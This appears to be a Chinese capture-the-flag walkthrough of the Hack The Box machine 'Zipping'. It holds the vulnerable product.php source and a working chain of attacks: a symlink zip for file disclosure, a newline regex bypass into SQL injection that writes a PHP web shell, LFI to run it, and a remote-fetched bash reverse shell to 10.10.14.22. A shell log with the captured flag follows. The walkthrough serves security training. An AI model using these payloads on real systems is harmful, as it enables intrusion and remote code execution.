先生成恶意的pdf,然后使用burpsuite抓包,抓取product.php内容
ln -s /var/www/html/shop/product.php lol.pdfzip --symlink lol.zip lol.pdf
product.php代码
// Check to make sure the id parameter is specified in the URLif (isset($_GET['id'])) {$id = $_GET['id'];// Filtering user input for letters or special charactersif(preg_match("/^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'",.<>/?]|[^0-9]$/", $id, $match)) {header('Location: index.php');} else {// Prepare statement and execute, but does not prevent SQL injection$stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");$stmt->execute();// Fetch the product from the database and return the result as an Array$product = $stmt->fetch(PDO::FETCH_ASSOC);// Check if the product exists (array is not empty)if (!$product) {// Simple error to display if the id for the product doesn't exists (array is empty)exit('Product does not exist!');}}} else {// Simple error to display if the id wasn't specifiedexit('No ID provided!');}=template_header('Zipping | Product')<div class="product content-wrapper"><img src="assets/imgs/<?=$product['img']?>" width="500" height="500" alt="<?=$product['name']?>"><div><h1 class="name"><?=$product['name']?></h1><span class="price">$<?=$product['price']?><?php if ($product['rrp'] > 0): ?><span class="rrp">$<?=$product['rrp']?></span><?php endif; ?></span><form action="index.php?page=cart" method="post"><input type="number" name="quantity" value="1" min="1" max="<?=$product['quantity']?>" placeholder="Quantity" required><input type="hidden" name="product_id" value="<?=$product['id']?>"><input type="submit" value="Add To Cart"></form><div class="description"><?=$product['desc']?></div></div></div><?=template_footer()?>
代码里面的注释说明了sql语句易受sql注入攻击,可以使用换行符绕过regex检查,因为/^.[A-Za-z!#$%^&()-_=+{}[]\|;:'“,.<>/?]只检查第一行(用换行符绕过=%0A) [^0-9]$/检查有效负载是否以数字结尾(绕过#1=%231)
编写文件并通过LFI执行,先生成一个shell文件,然后开启python服务器,等待反弹
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'" > rev.shpython3 -m http.server 80nc -lvnp 4444
curl -s $'http://zipping.htb/shop/index.php?page=product&id=%0A'%3bselect+'<%3fphp+system("curl+http%3a//10.10.14.22/rev.sh|bash")%3b%3f>'+into+outfile+'/var/lib/mysql/breached.php'+%231'curl -s $'http://zipping.htb/shop/index.php?page=..%2f..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fbreached'
成功拿到user flag:c41c61d3d2252776ca84fd7d1a29b466
# nc -lvnp 4444listening on [any] 4444 ...connect to [10.10.14.22] from (UNKNOWN) [10.10.11.229] 36748bash: cannot set terminal process group (1125): Inappropriate ioctl for devicebash: no job control in this shellrektsu@zipping:/var/www/html/shop$ ididuid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)rektsu@zipping:/var/www/html/shop$ datadatabash: data: command not foundrektsu@zipping:/var/www/html/shop$ timetimereal 0m0.000suser 0m0.000ssys 0m0.000srektsu@zipping:/var/www/html/shop$ datadatabash: data: command not foundrektsu@zipping:/var/www/html/shop$ cat /home/rektsu/user.txtcat /home/rektsu/user.txtc41c61d3d2252776ca84fd7d1a29b466rektsu@zipping:/var/www/html/shop$
原文始发于微信公众号(hades zorejt):HTB-Zipping笔记-新get shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论